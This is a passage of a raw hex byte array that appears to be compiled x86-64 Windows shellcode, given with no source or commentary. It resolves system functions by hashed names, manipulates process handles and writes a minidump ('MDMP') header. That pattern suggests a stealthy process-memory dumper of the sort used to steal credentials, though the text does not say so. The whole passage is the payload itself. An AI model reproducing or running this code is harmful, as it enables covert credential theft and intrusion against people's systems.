x8D,0x45,0xA0,0x4C,0x8B,0x45,0xD8,0xBA,0x01,0x00,0x00,0x00,0x48,0x89,0xC1,0x41,0xFF,0xD0,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0xD5,0x00,0x00,0x00,0x48,0x8D,0x45,0x80,0x48,0x8D,0x50,0x08,0x48,0x8B,0x45,0xD0,0x41,0xB9,0x00,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x0D,0x2F,0x45,0x00,0x00,0xFF,0xD0,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0xA8,0x00,0x00,0x00,0x48,0x8B,0x55,0x10,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD1,0x4C,0x8D,0x05,0x34,0x45,0x00,0x00,0xBA,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0xC1,0x1E,0x00,0x00,0x83,0x7D,0x18,0x00,0x74,0x07,0xB8,0x03,0x00,0x00,0x40,0xEB,0x05,0xB8,0x03,0x00,0x00,0x00,0x89,0x45,0xE8,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0xFF,0x00,0x00,0x00,0x44,0x8B,0x4D,0xE0,0x44,0x8B,0x45,0xE4,0x8B,0x55,0xE8,0x48,0x8B,0x45,0xF0,0x48,0x8D,0x4D,0x80,0x48,0x89,0x4C,0x24,0x38,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x00,0x10,0x00,0x00,0xC7,0x44,0x24,0x20,0x00,0x10,0x00,0x00,0x4C,0x8B,0x55,0xC8,0x48,0x89,0xC1,0x41,0xFF,0xD2,0x48,0x8B,0x55,0x20,0x48,0x89,0x02,0x48,0x8B,0x45,0x20,0x48,0x8B,0x00,0x48,0x83,0xF8,0xFF,0x74,0x1B,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x13,0x90,0xEB,0x10,0x90,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x83,0x7D,0xF0,0x00,0x74,0x21,0x48,0x8B,0x05,0x56,0xAF,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x4E,0xAF,0x00,0x00,0xFF,0xD0,0x8B,0x45,0xFC,0x48,0x81,0xC4,0xC0,0x00,0x00,0x00,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x60,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0xEF,0x43,0x00,0x00,0x48,0x89,0xC1,0xE8,0xA2,0x92,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0xA4,0x6E,0x97,0x24,0x48,0x89,0xC1,0xE8,0xB0,0x90,0xFF,0xFF,0x48,0x89,0x45,0xE8,0x48,0x83,0x7D,0xE8,0x00,0x0F,0x84,0x9F,0x00,0x00,0x00,0x48,0x8B,0x05,0xCC,0xAE,0x00,0x00,0xFF,0xD0,0x41,0xB8,0x0A,0x02,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xBD,0xAE,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x77,0x48,0x8B,0x55,0x10,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD1,0x4C,0x8D,0x05,0xCC,0x43,0x00,0x00,0xBA,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x59,0x1D,0x00,0x00,0x48,0x8B,0x45,0xF0,0x48,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x20,0x03,0x00,0x00,0x00,0x4C,0x8B,0x55,0xE8,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x00,0x00,0x00,0xC0,0x48,0x89,0xC1,0x41,0xFF,0xD2,0x48,0x8B,0x55,0x18,0x48,0x89,0x02,0x48,0x8B,0x45,0x18,0x48,0x8B,0x00,0x48,0x83,0xF8,0xFF,0x74,0x0F,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x83,0x7D,0xF0,0x00,0x74,0x21,0x48,0x8B,0x05,0x1F,0xAE,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x17,0xAE,0x00,0x00,0xFF,0xD0,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x60,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0xC0,0x42,0x00,0x00,0x48,0x89,0xC1,0xE8,0x73,0x91,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x66,0x94,0x01,0x96,0x48,0x89,0xC1,0xE8,0x81,0x8F,0xFF,0xFF,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x35,0x48,0x8B,0x45,0x10,0x4C,0x8B,0x45,0xF0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x41,0xFF,0xD0,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x75,0x10,0x48,0x8B,0x05,0x7D,0xAD,0x00,0x00,0xFF,0xD0,0x3D,0x17,0x02,0x00,0x00,0x75,0x0C,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x58,0x48,0x8D,0x6C,0x24,0x50,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0x4C,0x89,0x45,0x30,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x18,0x42,0x00,0x00,0x48,0x89,0xC1,0xE8,0xCB,0x90,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x8F,0x97,0x38,0x8D,0x48,0x89,0xC1,0xE8,0xD9,0x8E,0xFF,0xFF,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x0F,0x84,0x87,0x00,0x00,0x00,0x48,0x8B,0x05,0xF5,0xAC,0x00,0x00,0xFF,0xD0,0x41,0xB8,0x00,0x10,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xE6,0xAC,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0x28,0x48,0x89,0x02,0x48,0x8B,0x45,0x28,0x48,0x8B,0x00,0x48,0x85,0xC0,0x74,0x57,0x48,0x8B,0x45,0x28,0x48,0x8B,0x10,0x48,0x8D,0x4D,0xEC,0x48,0x8B,0x45,0x20,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x4C,0x8B,0x55,0xF0,0x49,0x89,0xC9,0x41,0xB8,0x00,0x10,0x00,0x00,0x48,0x89,0xC1,0x41,0xFF,0xD2,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x74,0x26,0x8B,0x45,0xEC,0x85,0xC0,0x74,0x1F,0x48,0x83,0x7D,0x30,0x00,0x74,0x09,0x8B,0x55,0xEC,0x48,0x8B,0x45,0x30,0x89,0x10,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xFC,0x00,0x75,0x3B,0x48,0x8B,0x45,0x28,0x48,0x8B,0x00,0x48,0x85,0xC0,0x74,0x2F,0x48,0x8B,0x45,0x28,0x48,0x8B,0x18,0x48,0x8B,0x05,0x4E,0xAC,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x4A,0xAC,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x45,0x28,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x58,0x5B,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x38,0x48,0x8D,0x6C,0x24,0x30,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0x4C,0x89,0x45,0x30,0x4C,0x89,0x4D,0x38,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x8B,0x05,0xEB,0xAB,0x00,0x00,0xFF,0xD0,0x41,0xB8,0x00,0x10,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xDC,0xAB,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x48,0x85,0xC0,0x0F,0x84,0xBF,0x00,0x00,0x00,0x48,0x8D,0x55,0xF0,0x48,0x8B,0x45,0x20,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x45,0xFE,0xFF,0xFF,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x0F,0x84,0x9F,0x00,0x00,0x00,0x48,0x8B,0x45,0xF0,0x8B,0x00,0x85,0xC0,0x0F,0x85,0x94,0x00,0x00,0x00,0x48,0x83,0x7D,0x28,0x00,0x74,0x50,0x48,0x8B,0x05,0x82,0xAB,0x00,0x00,0xFF,0xD0,0x41,0xB8,0x05,0x01,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x73,0xAB,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0x28,0x48,0x89,0x02,0x48,0x8B,0x45,0x28,0x48,0x8B,0x00,0x48,0x85,0xC0,0x74,0x5D,0x48,0x8B,0x45,0xF0,0x48,0x8D,0x50,0x08,0x48,0x8B,0x45,0x28,0x48,0x8B,0x00,0x41,0xB8,0x05,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0xB9,0x19,0x00,0x00,0x48,0x83,0x7D,0x30,0x00,0x74,0x10,0x48,0x8B,0x45,0xF0,0x8B,0x90,0x30,0x08,0x00,0x00,0x48,0x8B,0x45,0x30,0x89,0x10,0x48,0x83,0x7D,0x38,0x00,0x74,0x10,0x48,0x8B,0x45,0xF0,0x8B,0x90,0x34,0x08,0x00,0x00,0x48,0x8B,0x45,0x38,0x89,0x10,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0xF0,0x48,0x85,0xC0,0x74,0x21,0x48,0x8B,0x5D,0xF0,0x48,0x8B,0x05,0xE4,0xAA,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xE0,0xAA,0x00,0x00,0xFF,0xD0,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x38,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x50,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x79,0x3F,0x00,0x00,0x48,0x89,0xC1,0xE8,0x2C,0x8E,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x6F,0x1B,0x7C,0xED,0x48,0x89,0xC1,0xE8,0x3A,0x8C,0xFF,0xFF,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x4A,0x4C,0x8D,0x45,0xEC,0x8B,0x4D,0x20,0x48,0x8B,0x55,0x18,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x4C,0x8B,0x55,0xF0,0x4D,0x89,0xC1,0x41,0x89,0xC8,0x48,0x89,0xC1,0x41,0xFF,0xD2,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x75,0x10,0x48,0x8B,0x05,0x21,0xAA,0x00,0x00,0xFF,0xD0,0x3D,0xE5,0x03,0x00,0x00,0x75,0x0C,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x50,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0x44,0x89,0x4D,0x28,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x8B,0x05,0xD5,0xA9,0x00,0x00,0xFF,0xD0,0x41,0xB8,0x38,0x08,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xC6,0xA9,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x66,0x48,0x8B,0x45,0xF0,0xC7,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xF0,0x48,0x8D,0x48,0x08,0x48,0x8B,0x45,0x18,0x41,0xB8,0x05,0x01,0x00,0x00,0x48,0x89,0xC2,0xE8,0x0D,0x18,0x00,0x00,0x48,0x8B,0x45,0xF0,0x8B,0x55,0x20,0x89,0x90,0x30,0x08,0x00,0x00,0x48,0x8B,0x45,0xF0,0x8B,0x55,0x28,0x89,0x90,0x34,0x08,0x00,0x00,0x48,0x8B,0x55,0xF0,0x48,0x8B,0x45,0x10,0x41,0xB8,0x38,0x08,0x00,0x00,0x48,0x89,0xC1,0xE8,0x99,0xFE,0xFF,0xFF,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x74,0x0C,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x83,0x7D,0xF0,0x00,0x74,0x21,0x48,0x8B,0x05,0x39,0xA9,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x31,0xA9,0x00,0x00,0xFF,0xD0,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0x83,0x7D,0x10,0x00,0x74,0x07,0x48,0x83,0x7D,0x10,0xFF,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x60,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0xC5,0x3D,0x00,0x00,0x48,0x89,0xC1,0xE8,0x78,0x8C,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0xEA,0x7A,0xA4,0xAE,0x48,0x89,0xC1,0xE8,0x86,0x8A,0xFF,0xFF,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x1F,0x48,0x8B,0x45,0x10,0x48,0x8B,0x55,0xF0,0x48,0x89,0xC1,0xFF,0xD2,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x74,0x0C,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x8B,0x05,0x55,0xA8,0x00,0x00,0xFF,0xD0,0x41,0xB8,0x38,0x08,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x46,0xA8,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x3C,0x48,0x8B,0x45,0xF0,0xC7,0x00,0x01,0x00,0x00,0x00,0x48,0x8B,0x45,0xF0,0x8B,0x55,0x18,0x89,0x50,0x08,0x48,0x8B,0x55,0xF0,0x48,0x8B,0x45,0x10,0x41,0xB8,0x38,0x08,0x00,0x00,0x48,0x89,0xC1,0xE8,0x43,0xFD,0xFF,0xFF,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x74,0x0C,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x83,0x7D,0xF0,0x00,0x74,0x21,0x48,0x8B,0x05,0xE3,0xA7,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xDB,0xA7,0x00,0x00,0xFF,0xD0,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x38,0x48,0x8D,0x6C,0x24,0x30,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x8D,0x55,0xF0,0x48,0x8B,0x45,0x20,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x1B,0xFA,0xFF,0xFF,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x74,0x21,0x48,0x8B,0x45,0xF0,0x8B,0x00,0x83,0xF8,0x01,0x75,0x19,0x48,0x8B,0x45,0xF0,0x8B,0x50,0x08,0x48,0x8B,0x45,0x28,0x89,0x10,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0xF0,0x48,0x85,0xC0,0x74,0x21,0x48,0x8B,0x5D,0xF0,0x48,0x8B,0x05,0x3F,0xA7,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x3B,0xA7,0x00,0x00,0xFF,0xD0,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x38,0x5B,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x57,0x53,0x48,0x81,0xEC,0x20,0x03,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0xC7,0x85,0x80,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x78,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0x74,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0x70,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x85,0x40,0x02,0x00,0x00,0x0F,0x11,0x85,0x50,0x02,0x00,0x00,0x66,0x0F,0xD6,0x85,0x60,0x02,0x00,0x00,0xC7,0x85,0x9C,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0x94,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0x98,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x38,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x30,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x88,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x55,0x20,0xB8,0x00,0x00,0x00,0x00,0xB9,0x41,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0xC7,0x45,0x10,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x18,0x00,0x00,0x00,0x00,0x48,0x8D,0x85,0x80,0x02,0x00,0x00,0x49,0x89,0xC0,0xBA,0x00,0x00,0x00,0x00,0x48,0x8D,0x05,0xA1,0x3B,0x00,0x00,0x48,0x89,0xC1,0xE8,0x99,0xF4,0xFF,0xFF,0x89,0x85,0x94,0x02,0x00,0x00,0x83,0xBD,0x94,0x02,0x00,0x00,0x00,0x0F,0x84,0xE1,0x02,0x00,0x00,0x48,0x8D,0x05,0xAF,0x3B,0x00,0x00,0x48,0x89,0xC1,0xE8,0xE7,0xF2,0xFF,0xFF,0x89,0x85,0x94,0x02,0x00,0x00,0x83,0xBD,0x94,0x02,0x00,0x00,0x00,0x0F,0x84,0xC2,0x02,0x00,0x00,0x48,0x8B,0x85,0x80,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x01,0xF8,0xFF,0xFF,0x89,0x85,0x94,0x02,0x00,0x00,0x83,0xBD,0x94,0x02,0x00,0x00,0x00,0x0F,0x84,0xA3,0x02,0x00,0x00,0x48,0x8B,0x85,0x80,0x02,0x00,0x00,0x4C,0x8D,0x85,0x70,0x02,0x00,0x00,0x48,0x8D,0x8D,0x74,0x02,0x00,0x00,0x48,0x8D,0x95,0x78,0x02,0x00,0x00,0x4D,0x89,0xC1,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x9D,0xF9,0xFF,0xFF,0x89,0x85,0x94,0x02,0x00,0x00,0x83,0xBD,0x94,0x02,0x00,0x00,0x00,0x0F,0x84,0x69,0x02,0x00,0x00,0x48,0x8D,0x45,0x20,0x48,0x89,0x45,0x18,0x66,0xC7,0x45,0x10,0x00,0x00,0x66,0xC7,0x45,0x12,0x00,0x00,0x48,0x8B,0x95,0x78,0x02,0x00,0x00,0x48,0x8D,0x45,0x10,0x48,0x89,0xC1,0xE8,0x2E,0x74,0xFF,0xFF,0x48,0xC7,0x85,0x48,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x58,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x0F,0xB7,0x45,0x10,0x66,0x85,0xC0,0x0F,0x84,0x22,0x02,0x00,0x00,0x83,0xBD,0x98,0x02,0x00,0x00,0x00,0x75,0x18,0xE8,0x78,0x83,0xFF,0xFF,0x89,0x85,0x98,0x02,0x00,0x00,0x83,0xBD,0x98,0x02,0x00,0x00,0x00,0x0F,0x84,0x04,0x02,0x00,0x00,0x48,0x8D,0x45,0x10,0x48,0x89,0xC1,0xE8,0x8A,0x76,0xFF,0xFF,0x85,0xC0,0x0F,0x84,0xF3,0x01,0x00,0x00,0x4C,0x8B,0x85,0x78,0x02,0x00,0x00,0x8B,0x8D,0x74,0x02,0x00,0x00,0x44,0x8B,0x8D,0x70,0x02,0x00,0x00,0x8B,0x95,0x98,0x02,0x00,0x00,0x48,0x8D,0x85,0x38,0x02,0x00,0x00,0xC7,0x84,0x24,0x88,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x84,0x24,0x80,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x78,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x70,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x68,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x60,0x00,0x00,0x00,0x00,0x4C,0x89,0x44,0x24,0x58,0x89,0x4C,0x24,0x50,0x48,0xC7,0x44,0x24,0x48,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x40,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x38,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x58,0x93,0xFF,0xFF,0x89,0x85,0x94,0x02,0x00,0x00,0x83,0xBD,0x94,0x02,0x00,0x00,0x00,0x0F,0x84,0x42,0x01,0x00,0x00,0x8B,0x85,0x74,0x02,0x00,0x00,0x85,0xC0,0x74,0x1E,0xC7,0x85,0x60,0x02,0x00,0x00,0x4D,0x44,0x4D,0x50,0x66,0xC7,0x85,0x64,0x02,0x00,0x00,0x93,0xA7,0x66,0xC7,0x85,0x66,0x02,0x00,0x00,0x00,0x00,0xEB,0x2C,0x48,0x8D,0x85,0x40,0x02,0x00,0x00,0x48,0x8D,0x48,0x26,0x48,0x8D,0x85,0x40,0x02,0x00,0x00,0x48,0x8D,0x50,0x24,0x48,0x8D,0x85,0x40,0x02,0x00,0x00,0x48,0x83,0xC0,0x20,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xC8,0x7C,0xFF,0xFF,0x48,0xC7,0x85,0x30,0x02,0x00,0x00,0x00,0x00,0x80,0x0C,0x48,0x8D,0x85,0x30,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0xD6,0x7B,0xFF,0xFF,0x48,0x89,0x85,0x88,0x02,0x00,0x00,0x48,0x83,0xBD,0x88,0x02,0x00,0x00,0x00,0x0F,0x84,0xC2,0x00,0x00,0x00,0x48,0x8B,0x85,0x38,0x02,0x00,0x00,0x48,0x89,0x85,0x40,0x02,0x00,0x00,0x48,0x8B,0x85,0x88,0x02,0x00,0x00,0x48,0x89,0x85,0x48,0x02,0x00,0x00,0xC7,0x85,0x50,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0x30,0x02,0x00,0x00,0x48,0x89,0x85,0x58,0x02,0x00,0x00,0x48,0x8D,0x85,0x40,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x89,0xEF,0xFF,0xFF,0x89,0x85,0x94,0x02,0x00,0x00,0x83,0xBD,0x94,0x02,0x00,0x00,0x00,0x74,0x73,0x8B,0x85,0x74,0x02,0x00,0x00,0x85,0xC0,0x75,0x17,0x8B,0x85,0x50,0x02,0x00,0x00,0x89,0xC2,0x48,0x8B,0x85,0x48,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0xAC,0x7B,0xFF,0xFF,0x8B,0x8D,0x50,0x02,0x00,0x00,0x48,0x8B,0x95,0x48,0x02,0x00,0x00,0x48,0x8D,0x45,0x10,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x54,0x73,0xFF,0xFF,0x89,0x85,0x94,0x02,0x00,0x00,0x83,0xBD,0x94,0x02,0x00,0x00,0x00,0x74,0x2A,0xC7,0x85,0x9C,0x02,0x00,0x00,0x01,0x00,0x00,0x00,0xEB,0x1F,0x90,0xEB,0x1C,0x90,0xEB,0x19,0x90,0xEB,0x16,0x90,0xEB,0x13,0x90,0xEB,0x10,0x90,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x85,0x48,0x02,0x00,0x00,0x48,0x85,0xC0,0x74,0x22,0x48,0x8B,0x85,0x58,0x02,0x00,0x00,0x48,0x85,0xC0,0x74,0x16,0x48,0x8B,0x95,0x58,0x02,0x00,0x00,0x48,0x8B,0x85,0x48,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x37,0x7B,0xFF,0xFF,0x48,0x8B,0x85,0x38,0x02,0x00,0x00,0x48,0x85,0xC0,0x74,0x0F,0x48,0x8B,0x85,0x38,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0xC3,0xC1,0xFF,0xFF,0x83,0xBD,0x9C,0x02,0x00,0x00,0x00,0x75,0x0F,0x48,0x8B,0x85,0x78,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x23,0x75,0xFF,0xFF,0x48,0x8B,0